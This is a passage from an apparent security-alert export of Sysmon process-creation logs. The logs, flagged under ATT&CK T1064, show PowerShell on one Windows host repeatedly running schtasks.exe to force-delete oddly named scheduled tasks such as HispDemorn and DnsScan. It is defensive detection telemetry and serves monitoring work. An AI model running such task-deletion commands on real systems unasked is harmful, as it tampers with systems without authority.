Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.496",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.128 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-001082442700} +ProcessId: 3460 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.130944100Z"",""eventRecordID"":""3084"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.128\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-001082442700}\r\nProcessId: 3460\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.128"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-001082442700}"",""processId"":""3460"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.468",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.104 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00101d422700} +ProcessId: 7320 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.107249400Z"",""eventRecordID"":""3083"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.104\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00101d422700}\r\nProcessId: 7320\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.104"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00101d422700}"",""processId"":""7320"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.437",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.083 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010713f2700} +ProcessId: 8152 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.085009500Z"",""eventRecordID"":""3082"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.083\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010713f2700}\r\nProcessId: 8152\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.083"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010713f2700}"",""processId"":""8152"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.400",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.062 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00108f3c2700} +ProcessId: 5948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.064662500Z"",""eventRecordID"":""3081"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.062\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00108f3c2700}\r\nProcessId: 5948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.062"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00108f3c2700}"",""processId"":""5948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.369",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.038 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010a6392700} +ProcessId: 4364 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.041239200Z"",""eventRecordID"":""3080"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.038\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-0010a6392700}\r\nProcessId: 4364\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.038"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-0010a6392700}"",""processId"":""4364"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:30.353",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:02.014 +ProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00106a372700} +ProcessId: 7608 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:02.016847200Z"",""eventRecordID"":""3079"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:02.014\r\nProcessGuid: {df9fc3d3-b3b6-5ecf-0000-00106a372700}\r\nProcessId: 7608\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:02.014"",""processGuid"":""{df9fc3d3-b3b6-5ecf-0000-00106a372700}"",""processId"":""7608"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 